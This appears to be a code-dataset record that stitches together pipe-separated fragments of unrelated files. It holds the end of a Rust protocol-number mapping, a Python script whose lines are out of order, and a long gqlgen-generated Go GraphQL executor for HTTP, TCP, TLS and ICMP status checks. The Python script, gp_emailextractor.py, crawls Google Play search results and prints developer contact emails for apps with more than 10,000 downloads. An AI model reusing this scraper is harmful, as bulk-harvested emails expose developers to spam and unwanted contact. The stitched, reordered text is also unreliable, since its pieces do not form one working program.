90 => NetworkProtocol::SPRITE_RPC,
91 => NetworkProtocol::LARP,
92 => NetworkProtocol::MTP,
93 => NetworkProtocol::AX_25,
94 => NetworkProtocol::IPIP,
95 => NetworkProtocol::MICP,
96 => NetworkProtocol::SCC_SP,
97 => NetworkProtocol::ETHERIP,
98 => NetworkProtocol::ENCAP,
100 => NetworkProtocol::GMTP,
101 => NetworkProtocol::IFMP,
102 => NetworkProtocol::PNNI,
103 => NetworkProtocol::PIM,
104 => NetworkProtocol::ARIS,
105 => NetworkProtocol::SCPS,
106 => NetworkProtocol::QNX,
107 => NetworkProtocol::A_N,
108 => NetworkProtocol::IPCOMP,
109 => NetworkProtocol::SNP,
110 => NetworkProtocol::COMPAQ_PEER,
111 => NetworkProtocol::IPX_IN_IP,
112 => NetworkProtocol::VRRP,
113 => NetworkProtocol::PGM,
115 => NetworkProtocol::L2TP,
116 => NetworkProtocol::DDX,
117 => NetworkProtocol::IATP,
118 => NetworkProtocol::STP,
119 => NetworkProtocol::SRP,
120 => NetworkProtocol::UTI,
121 => NetworkProtocol::SMP,
122 => NetworkProtocol::SM,
123 => NetworkProtocol::PTP,
124 => NetworkProtocol::ISIS,
125 => NetworkProtocol::FIRE,
126 => NetworkProtocol::CRTP,
127 => NetworkProtocol::CRUDP,
128 => NetworkProtocol::SSCOPMCE,
129 => NetworkProtocol::IPLT,
130 => NetworkProtocol::SPS,
131 => NetworkProtocol::PIPE,
132 => NetworkProtocol::SCTP,
133 => NetworkProtocol::FC,
134 => NetworkProtocol::RSVP_E2E_IGNORE,
135 => NetworkProtocol::MOBILITY,
136 => NetworkProtocol::UDPLITE,
137 => NetworkProtocol::MPLS_IN_IP,
138 => NetworkProtocol::MANET,
139 => NetworkProtocol::HIP,
140 => NetworkProtocol::SHIM6,
141 => NetworkProtocol::WESP,
142 => NetworkProtocol::ROHC,
143 => NetworkProtocol::ETHERNET,
253 => NetworkProtocol::USE,
254 => NetworkProtocol::USE,
255 => NetworkProtocol::RESERVED,
_ => NetworkProtocol::UNKNOWN,
}
}
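// Illustrative sketch (not part of the original file): mapping raw IANA
// protocol numbers to variants.
//
// assert_eq!(parse_protocol_id(6), NetworkProtocol::TCP);
// assert_eq!(parse_protocol_id(17), NetworkProtocol::UDP);
// assert_eq!(parse_protocol_id(200), NetworkProtocol::UNKNOWN);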
| NetworkProtocol |
gp_emailextractor.py | import urllib.request
import re,time
s1=time.time()
# some variables for filtering
app_with_download_more_than = 10000
app_updated_after = {"year": "2016", "date": "1", "month": "02"}
def linker(mainlink):
mlink= urllib.request.urlopen(str(mainlink))
page=mlink.read()
#print (page)
link=re.findall('href="/store/apps/details?(.*?)"',str(page),re.DOTALL)
no=0
for i in range(len(link)):
#print link
if(len(link[i])<100):
if(link[i]>link[i-1]):
| mlink= urllib.request.urlopen(pagelink)
appage=str(mlink.read())
data2=re.findall('<span class="htlgb"><div class="IQ1z0d"><span class="htlgb">(.*?)</span></div></span></div><div class="hAyfc"><div class="BgcNfc">',str(appage))
## date
## print("date ="+data2[0])
## downloads
#print("no of download ="+data2[2])
data2=str(data2[2]).replace(",","").replace("+","")
if(int(data2)>=app_with_download_more_than):
mail=re.findall('class="hrTbp euBY6b">(.*?)</a>',appage,re.DOTALL)
print (mail[0])
linker("https://play.google.com/store/apps/details"+str(link[i]))
else:
None
## starting link for extractor
linker("https://play.google.com/store/search?q=cal&c=apps&price=1")
s2=time.time()
## timer
print (s2-s1) | #print (link[i])
pagelink="https://play.google.com/store/apps/details"+str(link[i])
#print (pagelink)
|
generated.go | // Code generated by github.com/99designs/gqlgen, DO NOT EDIT.
package generated
import (
"bytes"
"context"
"errors"
"fmt"
"strconv"
"sync"
"time"
"github.com/99designs/gqlgen/graphql"
"github.com/99designs/gqlgen/graphql/introspection"
"github.com/kfsoftware/statuspage/pkg/graphql/models"
gqlparser "github.com/vektah/gqlparser/v2"
"github.com/vektah/gqlparser/v2/ast"
)
// region ************************** generated!.gotpl **************************
// NewExecutableSchema creates an ExecutableSchema from the ResolverRoot interface.
func | (cfg Config) graphql.ExecutableSchema {
return &executableSchema{
resolvers: cfg.Resolvers,
directives: cfg.Directives,
complexity: cfg.Complexity,
}
}
type Config struct {
Resolvers ResolverRoot
Directives DirectiveRoot
Complexity ComplexityRoot
}
type ResolverRoot interface {
Mutation() MutationResolver
Query() QueryResolver
}
type DirectiveRoot struct {
}
type ComplexityRoot struct {
CheckExecution struct {
ErrorMsg func(childComplexity int) int
ExecutionTime func(childComplexity int) int
ID func(childComplexity int) int
Message func(childComplexity int) int
Status func(childComplexity int) int
}
DeleteResponse struct {
ID func(childComplexity int) int
}
HTTPCheck struct {
ErrorMsg func(childComplexity int) int
Frecuency func(childComplexity int) int
ID func(childComplexity int) int
Identifier func(childComplexity int) int
LatestCheck func(childComplexity int) int
Message func(childComplexity int) int
Status func(childComplexity int) int
URL func(childComplexity int) int
}
IcmpCheck struct {
Address func(childComplexity int) int
ErrorMsg func(childComplexity int) int
Frecuency func(childComplexity int) int
ID func(childComplexity int) int
Identifier func(childComplexity int) int
LatestCheck func(childComplexity int) int
Message func(childComplexity int) int
Status func(childComplexity int) int
}
Mutation struct {
CreateHTTPCheck func(childComplexity int, input models.CreateHTTPCheckInput) int
CreateIcmpCheck func(childComplexity int, input models.CreateIcmpCheckInput) int
CreateTCPCheck func(childComplexity int, input models.CreateTCPCheckInput) int
CreateTLSCheck func(childComplexity int, input models.CreateTLSCheckInput) int
DeleteCheck func(childComplexity int, id string) int
Poll func(childComplexity int) int
}
PollResult struct {
Took func(childComplexity int) int
}
Query struct {
Checks func(childComplexity int) int
Executions func(childComplexity int, checkID string, from *time.Time, until *time.Time) int
}
TCPCheck struct {
Address func(childComplexity int) int
ErrorMsg func(childComplexity int) int
Frecuency func(childComplexity int) int
ID func(childComplexity int) int
Identifier func(childComplexity int) int
LatestCheck func(childComplexity int) int
Message func(childComplexity int) int
Status func(childComplexity int) int
}
TLSCheck struct {
Address func(childComplexity int) int
ErrorMsg func(childComplexity int) int
Frecuency func(childComplexity int) int
ID func(childComplexity int) int
Identifier func(childComplexity int) int
LatestCheck func(childComplexity int) int
Message func(childComplexity int) int
Status func(childComplexity int) int
}
}
type MutationResolver interface {
Poll(ctx context.Context) (*models.PollResult, error)
CreateHTTPCheck(ctx context.Context, input models.CreateHTTPCheckInput) (models.Check, error)
CreateTCPCheck(ctx context.Context, input models.CreateTCPCheckInput) (models.Check, error)
CreateTLSCheck(ctx context.Context, input models.CreateTLSCheckInput) (models.Check, error)
CreateIcmpCheck(ctx context.Context, input models.CreateIcmpCheckInput) (models.Check, error)
DeleteCheck(ctx context.Context, id string) (*models.DeleteResponse, error)
}
type QueryResolver interface {
Checks(ctx context.Context) ([]models.Check, error)
Executions(ctx context.Context, checkID string, from *time.Time, until *time.Time) ([]*models.CheckExecution, error)
}
type executableSchema struct {
resolvers ResolverRoot
directives DirectiveRoot
complexity ComplexityRoot
}
func (e *executableSchema) Schema() *ast.Schema {
return parsedSchema
}
func (e *executableSchema) Complexity(typeName, field string, childComplexity int, rawArgs map[string]interface{}) (int, bool) {
ec := executionContext{nil, e}
_ = ec
switch typeName + "." + field {
case "CheckExecution.errorMsg":
if e.complexity.CheckExecution.ErrorMsg == nil {
break
}
return e.complexity.CheckExecution.ErrorMsg(childComplexity), true
case "CheckExecution.executionTime":
if e.complexity.CheckExecution.ExecutionTime == nil {
break
}
return e.complexity.CheckExecution.ExecutionTime(childComplexity), true
case "CheckExecution.id":
if e.complexity.CheckExecution.ID == nil {
break
}
return e.complexity.CheckExecution.ID(childComplexity), true
case "CheckExecution.message":
if e.complexity.CheckExecution.Message == nil {
break
}
return e.complexity.CheckExecution.Message(childComplexity), true
case "CheckExecution.status":
if e.complexity.CheckExecution.Status == nil {
break
}
return e.complexity.CheckExecution.Status(childComplexity), true
case "DeleteResponse.id":
if e.complexity.DeleteResponse.ID == nil {
break
}
return e.complexity.DeleteResponse.ID(childComplexity), true
case "HttpCheck.errorMsg":
if e.complexity.HTTPCheck.ErrorMsg == nil {
break
}
return e.complexity.HTTPCheck.ErrorMsg(childComplexity), true
case "HttpCheck.frecuency":
if e.complexity.HTTPCheck.Frecuency == nil {
break
}
return e.complexity.HTTPCheck.Frecuency(childComplexity), true
case "HttpCheck.id":
if e.complexity.HTTPCheck.ID == nil {
break
}
return e.complexity.HTTPCheck.ID(childComplexity), true
case "HttpCheck.identifier":
if e.complexity.HTTPCheck.Identifier == nil {
break
}
return e.complexity.HTTPCheck.Identifier(childComplexity), true
case "HttpCheck.latestCheck":
if e.complexity.HTTPCheck.LatestCheck == nil {
break
}
return e.complexity.HTTPCheck.LatestCheck(childComplexity), true
case "HttpCheck.message":
if e.complexity.HTTPCheck.Message == nil {
break
}
return e.complexity.HTTPCheck.Message(childComplexity), true
case "HttpCheck.status":
if e.complexity.HTTPCheck.Status == nil {
break
}
return e.complexity.HTTPCheck.Status(childComplexity), true
case "HttpCheck.url":
if e.complexity.HTTPCheck.URL == nil {
break
}
return e.complexity.HTTPCheck.URL(childComplexity), true
case "IcmpCheck.address":
if e.complexity.IcmpCheck.Address == nil {
break
}
return e.complexity.IcmpCheck.Address(childComplexity), true
case "IcmpCheck.errorMsg":
if e.complexity.IcmpCheck.ErrorMsg == nil {
break
}
return e.complexity.IcmpCheck.ErrorMsg(childComplexity), true
case "IcmpCheck.frecuency":
if e.complexity.IcmpCheck.Frecuency == nil {
break
}
return e.complexity.IcmpCheck.Frecuency(childComplexity), true
case "IcmpCheck.id":
if e.complexity.IcmpCheck.ID == nil {
break
}
return e.complexity.IcmpCheck.ID(childComplexity), true
case "IcmpCheck.identifier":
if e.complexity.IcmpCheck.Identifier == nil {
break
}
return e.complexity.IcmpCheck.Identifier(childComplexity), true
case "IcmpCheck.latestCheck":
if e.complexity.IcmpCheck.LatestCheck == nil {
break
}
return e.complexity.IcmpCheck.LatestCheck(childComplexity), true
case "IcmpCheck.message":
if e.complexity.IcmpCheck.Message == nil {
break
}
return e.complexity.IcmpCheck.Message(childComplexity), true
case "IcmpCheck.status":
if e.complexity.IcmpCheck.Status == nil {
break
}
return e.complexity.IcmpCheck.Status(childComplexity), true
case "Mutation.createHttpCheck":
if e.complexity.Mutation.CreateHTTPCheck == nil {
break
}
args, err := ec.field_Mutation_createHttpCheck_args(context.TODO(), rawArgs)
if err != nil {
return 0, false
}
return e.complexity.Mutation.CreateHTTPCheck(childComplexity, args["input"].(models.CreateHTTPCheckInput)), true
case "Mutation.createIcmpCheck":
if e.complexity.Mutation.CreateIcmpCheck == nil {
break
}
args, err := ec.field_Mutation_createIcmpCheck_args(context.TODO(), rawArgs)
if err != nil {
return 0, false
}
return e.complexity.Mutation.CreateIcmpCheck(childComplexity, args["input"].(models.CreateIcmpCheckInput)), true
case "Mutation.createTcpCheck":
if e.complexity.Mutation.CreateTCPCheck == nil {
break
}
args, err := ec.field_Mutation_createTcpCheck_args(context.TODO(), rawArgs)
if err != nil {
return 0, false
}
return e.complexity.Mutation.CreateTCPCheck(childComplexity, args["input"].(models.CreateTCPCheckInput)), true
case "Mutation.createTlsCheck":
if e.complexity.Mutation.CreateTLSCheck == nil {
break
}
args, err := ec.field_Mutation_createTlsCheck_args(context.TODO(), rawArgs)
if err != nil {
return 0, false
}
return e.complexity.Mutation.CreateTLSCheck(childComplexity, args["input"].(models.CreateTLSCheckInput)), true
case "Mutation.deleteCheck":
if e.complexity.Mutation.DeleteCheck == nil {
break
}
args, err := ec.field_Mutation_deleteCheck_args(context.TODO(), rawArgs)
if err != nil {
return 0, false
}
return e.complexity.Mutation.DeleteCheck(childComplexity, args["id"].(string)), true
case "Mutation.poll":
if e.complexity.Mutation.Poll == nil {
break
}
return e.complexity.Mutation.Poll(childComplexity), true
case "PollResult.took":
if e.complexity.PollResult.Took == nil {
break
}
return e.complexity.PollResult.Took(childComplexity), true
case "Query.checks":
if e.complexity.Query.Checks == nil {
break
}
return e.complexity.Query.Checks(childComplexity), true
case "Query.executions":
if e.complexity.Query.Executions == nil {
break
}
args, err := ec.field_Query_executions_args(context.TODO(), rawArgs)
if err != nil {
return 0, false
}
return e.complexity.Query.Executions(childComplexity, args["checkId"].(string), args["from"].(*time.Time), args["until"].(*time.Time)), true
case "TcpCheck.address":
if e.complexity.TCPCheck.Address == nil {
break
}
return e.complexity.TCPCheck.Address(childComplexity), true
case "TcpCheck.errorMsg":
if e.complexity.TCPCheck.ErrorMsg == nil {
break
}
return e.complexity.TCPCheck.ErrorMsg(childComplexity), true
case "TcpCheck.frecuency":
if e.complexity.TCPCheck.Frecuency == nil {
break
}
return e.complexity.TCPCheck.Frecuency(childComplexity), true
case "TcpCheck.id":
if e.complexity.TCPCheck.ID == nil {
break
}
return e.complexity.TCPCheck.ID(childComplexity), true
case "TcpCheck.identifier":
if e.complexity.TCPCheck.Identifier == nil {
break
}
return e.complexity.TCPCheck.Identifier(childComplexity), true
case "TcpCheck.latestCheck":
if e.complexity.TCPCheck.LatestCheck == nil {
break
}
return e.complexity.TCPCheck.LatestCheck(childComplexity), true
case "TcpCheck.message":
if e.complexity.TCPCheck.Message == nil {
break
}
return e.complexity.TCPCheck.Message(childComplexity), true
case "TcpCheck.status":
if e.complexity.TCPCheck.Status == nil {
break
}
return e.complexity.TCPCheck.Status(childComplexity), true
case "TlsCheck.address":
if e.complexity.TLSCheck.Address == nil {
break
}
return e.complexity.TLSCheck.Address(childComplexity), true
case "TlsCheck.errorMsg":
if e.complexity.TLSCheck.ErrorMsg == nil {
break
}
return e.complexity.TLSCheck.ErrorMsg(childComplexity), true
case "TlsCheck.frecuency":
if e.complexity.TLSCheck.Frecuency == nil {
break
}
return e.complexity.TLSCheck.Frecuency(childComplexity), true
case "TlsCheck.id":
if e.complexity.TLSCheck.ID == nil {
break
}
return e.complexity.TLSCheck.ID(childComplexity), true
case "TlsCheck.identifier":
if e.complexity.TLSCheck.Identifier == nil {
break
}
return e.complexity.TLSCheck.Identifier(childComplexity), true
case "TlsCheck.latestCheck":
if e.complexity.TLSCheck.LatestCheck == nil {
break
}
return e.complexity.TLSCheck.LatestCheck(childComplexity), true
case "TlsCheck.message":
if e.complexity.TLSCheck.Message == nil {
break
}
return e.complexity.TLSCheck.Message(childComplexity), true
case "TlsCheck.status":
if e.complexity.TLSCheck.Status == nil {
break
}
return e.complexity.TLSCheck.Status(childComplexity), true
}
return 0, false
}
func (e *executableSchema) Exec(ctx context.Context) graphql.ResponseHandler {
rc := graphql.GetOperationContext(ctx)
ec := executionContext{rc, e}
first := true
switch rc.Operation.Operation {
case ast.Query:
return func(ctx context.Context) *graphql.Response {
if !first {
return nil
}
first = false
data := ec._Query(ctx, rc.Operation.SelectionSet)
var buf bytes.Buffer
data.MarshalGQL(&buf)
return &graphql.Response{
Data: buf.Bytes(),
}
}
case ast.Mutation:
return func(ctx context.Context) *graphql.Response {
if !first {
return nil
}
first = false
data := ec._Mutation(ctx, rc.Operation.SelectionSet)
var buf bytes.Buffer
data.MarshalGQL(&buf)
return &graphql.Response{
Data: buf.Bytes(),
}
}
default:
return graphql.OneShot(graphql.ErrorResponse(ctx, "unsupported GraphQL operation"))
}
}
type executionContext struct {
*graphql.OperationContext
*executableSchema
}
func (ec *executionContext) introspectSchema() (*introspection.Schema, error) {
if ec.DisableIntrospection {
return nil, errors.New("introspection disabled")
}
return introspection.WrapSchema(parsedSchema), nil
}
func (ec *executionContext) introspectType(name string) (*introspection.Type, error) {
if ec.DisableIntrospection {
return nil, errors.New("introspection disabled")
}
return introspection.WrapTypeFromDef(parsedSchema, parsedSchema.Types[name]), nil
}
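// The SDL below is embedded verbatim at generation time and parsed once into
// parsedSchema during package initialization; introspection queries are served
// from that parsed schema. Note that the field name "frecuency" (sic) is part
// of the public API and is therefore preserved, unchanged, throughout the
// generated resolvers above and below.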
var sources = []*ast.Source{
{Name: "schema.graphql", Input: `schema {
query: Query
mutation: Mutation
# subscription: Subscription
}
scalar Time
type CheckExecution {
id: ID!
executionTime: Time!
message: String!
errorMsg: String!
status: String!
}
interface Check {
id: ID!
identifier: String!
frecuency: String!
status: String!
latestCheck: Time
message: String!
errorMsg: String!
}
type HttpCheck implements Check {
id: ID!
identifier: String!
frecuency: String!
url: String!
status: String!
latestCheck: Time
message: String!
errorMsg: String!
}
type TcpCheck implements Check {
id: ID!
identifier: String!
frecuency: String!
address: String!
status: String!
latestCheck: Time
message: String!
errorMsg: String!
}
type TlsCheck implements Check {
id: ID!
identifier: String!
frecuency: String!
address: String!
status: String!
latestCheck: Time
message: String!
errorMsg: String!
}
type IcmpCheck implements Check {
id: ID!
identifier: String!
frecuency: String!
address: String!
status: String!
latestCheck: Time
message: String!
errorMsg: String!
}
input CreateHttpCheckInput {
id: String!
frecuency: String!
url: String!
}
type DeleteResponse {
id: ID!
}
type PollResult {
took: Int!
}
type Mutation {
poll: PollResult
createHttpCheck(input: CreateHttpCheckInput!): Check!
createTcpCheck(input: CreateTcpCheckInput!): Check!
createTlsCheck(input: CreateTlsCheckInput!): Check!
createIcmpCheck(input: CreateIcmpCheckInput!): Check!
deleteCheck(id: ID!): DeleteResponse!
}
input CreateIcmpCheckInput {
id: String!
frecuency: String!
address: String!
}
input CreateTlsCheckInput {
id: String!
frecuency: String!
address: String!
rootCAs: String
}
input CreateTcpCheckInput {
id: String!
frecuency: String!
address: String!
}
type Query {
checks: [Check!]
executions(
checkId: ID!,
from: Time,
until: Time
): [CheckExecution!]
}
`, BuiltIn: false},
}
var parsedSchema = gqlparser.MustLoadSchema(sources...)
// endregion ************************** generated!.gotpl **************************
// region ***************************** args.gotpl *****************************
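// Each field_*_args helper below coerces the raw argument map supplied by the
// transport into typed Go values, returning an error (surfaced as a GraphQL
// field error) when unmarshalling fails. field_Query_executions_args, for
// example, coerces "checkId" to a string and "from"/"until" to optional
// *time.Time values before the Query.executions resolver runs.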
func (ec *executionContext) field_Mutation_createHttpCheck_args(ctx context.Context, rawArgs map[string]interface{}) (map[string]interface{}, error) {
var err error
args := map[string]interface{}{}
var arg0 models.CreateHTTPCheckInput
if tmp, ok := rawArgs["input"]; ok {
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("input"))
arg0, err = ec.unmarshalNCreateHttpCheckInput2githubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCreateHTTPCheckInput(ctx, tmp)
if err != nil {
return nil, err
}
}
args["input"] = arg0
return args, nil
}
func (ec *executionContext) field_Mutation_createIcmpCheck_args(ctx context.Context, rawArgs map[string]interface{}) (map[string]interface{}, error) {
var err error
args := map[string]interface{}{}
var arg0 models.CreateIcmpCheckInput
if tmp, ok := rawArgs["input"]; ok {
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("input"))
arg0, err = ec.unmarshalNCreateIcmpCheckInput2githubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCreateIcmpCheckInput(ctx, tmp)
if err != nil {
return nil, err
}
}
args["input"] = arg0
return args, nil
}
func (ec *executionContext) field_Mutation_createTcpCheck_args(ctx context.Context, rawArgs map[string]interface{}) (map[string]interface{}, error) {
var err error
args := map[string]interface{}{}
var arg0 models.CreateTCPCheckInput
if tmp, ok := rawArgs["input"]; ok {
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("input"))
arg0, err = ec.unmarshalNCreateTcpCheckInput2githubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCreateTCPCheckInput(ctx, tmp)
if err != nil {
return nil, err
}
}
args["input"] = arg0
return args, nil
}
func (ec *executionContext) field_Mutation_createTlsCheck_args(ctx context.Context, rawArgs map[string]interface{}) (map[string]interface{}, error) {
var err error
args := map[string]interface{}{}
var arg0 models.CreateTLSCheckInput
if tmp, ok := rawArgs["input"]; ok {
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("input"))
arg0, err = ec.unmarshalNCreateTlsCheckInput2githubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCreateTLSCheckInput(ctx, tmp)
if err != nil {
return nil, err
}
}
args["input"] = arg0
return args, nil
}
func (ec *executionContext) field_Mutation_deleteCheck_args(ctx context.Context, rawArgs map[string]interface{}) (map[string]interface{}, error) {
var err error
args := map[string]interface{}{}
var arg0 string
if tmp, ok := rawArgs["id"]; ok {
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("id"))
arg0, err = ec.unmarshalNID2string(ctx, tmp)
if err != nil {
return nil, err
}
}
args["id"] = arg0
return args, nil
}
func (ec *executionContext) field_Query___type_args(ctx context.Context, rawArgs map[string]interface{}) (map[string]interface{}, error) {
var err error
args := map[string]interface{}{}
var arg0 string
if tmp, ok := rawArgs["name"]; ok {
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("name"))
arg0, err = ec.unmarshalNString2string(ctx, tmp)
if err != nil {
return nil, err
}
}
args["name"] = arg0
return args, nil
}
func (ec *executionContext) field_Query_executions_args(ctx context.Context, rawArgs map[string]interface{}) (map[string]interface{}, error) {
var err error
args := map[string]interface{}{}
var arg0 string
if tmp, ok := rawArgs["checkId"]; ok {
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("checkId"))
arg0, err = ec.unmarshalNID2string(ctx, tmp)
if err != nil {
return nil, err
}
}
args["checkId"] = arg0
var arg1 *time.Time
if tmp, ok := rawArgs["from"]; ok {
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("from"))
arg1, err = ec.unmarshalOTime2ᚖtimeᚐTime(ctx, tmp)
if err != nil {
return nil, err
}
}
args["from"] = arg1
var arg2 *time.Time
if tmp, ok := rawArgs["until"]; ok {
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("until"))
arg2, err = ec.unmarshalOTime2ᚖtimeᚐTime(ctx, tmp)
if err != nil {
return nil, err
}
}
args["until"] = arg2
return args, nil
}
func (ec *executionContext) field___Type_enumValues_args(ctx context.Context, rawArgs map[string]interface{}) (map[string]interface{}, error) {
var err error
args := map[string]interface{}{}
var arg0 bool
if tmp, ok := rawArgs["includeDeprecated"]; ok {
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("includeDeprecated"))
arg0, err = ec.unmarshalOBoolean2bool(ctx, tmp)
if err != nil {
return nil, err
}
}
args["includeDeprecated"] = arg0
return args, nil
}
func (ec *executionContext) field___Type_fields_args(ctx context.Context, rawArgs map[string]interface{}) (map[string]interface{}, error) {
var err error
args := map[string]interface{}{}
var arg0 bool
if tmp, ok := rawArgs["includeDeprecated"]; ok {
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("includeDeprecated"))
arg0, err = ec.unmarshalOBoolean2bool(ctx, tmp)
if err != nil {
return nil, err
}
}
args["includeDeprecated"] = arg0
return args, nil
}
// endregion ***************************** args.gotpl *****************************
// region ************************** directives.gotpl **************************
// endregion ************************** directives.gotpl **************************
// region **************************** field.gotpl *****************************
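// Every generated field resolver below follows the same shape: recover from
// resolver panics, attach a FieldContext, run the resolver through the
// configured middleware chain, enforce the schema's non-null constraints, and
// marshal the typed result. As an illustration (hypothetical values), the query
//
//	query { executions(checkId: "abc") { id status } }
//
// is answered by _Query_executions followed by _CheckExecution_id and
// _CheckExecution_status for each returned execution.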
func (ec *executionContext) _CheckExecution_id(ctx context.Context, field graphql.CollectedField, obj *models.CheckExecution) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "CheckExecution",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.ID, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNID2string(ctx, field.Selections, res)
}
func (ec *executionContext) _CheckExecution_executionTime(ctx context.Context, field graphql.CollectedField, obj *models.CheckExecution) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "CheckExecution",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.ExecutionTime, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(time.Time)
fc.Result = res
return ec.marshalNTime2timeᚐTime(ctx, field.Selections, res)
}
func (ec *executionContext) _CheckExecution_message(ctx context.Context, field graphql.CollectedField, obj *models.CheckExecution) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "CheckExecution",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Message, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _CheckExecution_errorMsg(ctx context.Context, field graphql.CollectedField, obj *models.CheckExecution) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "CheckExecution",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.ErrorMsg, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _CheckExecution_status(ctx context.Context, field graphql.CollectedField, obj *models.CheckExecution) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "CheckExecution",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Status, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _DeleteResponse_id(ctx context.Context, field graphql.CollectedField, obj *models.DeleteResponse) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "DeleteResponse",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.ID, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNID2string(ctx, field.Selections, res)
}
func (ec *executionContext) _HttpCheck_id(ctx context.Context, field graphql.CollectedField, obj *models.HTTPCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "HttpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.ID, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNID2string(ctx, field.Selections, res)
}
func (ec *executionContext) _HttpCheck_identifier(ctx context.Context, field graphql.CollectedField, obj *models.HTTPCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "HttpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
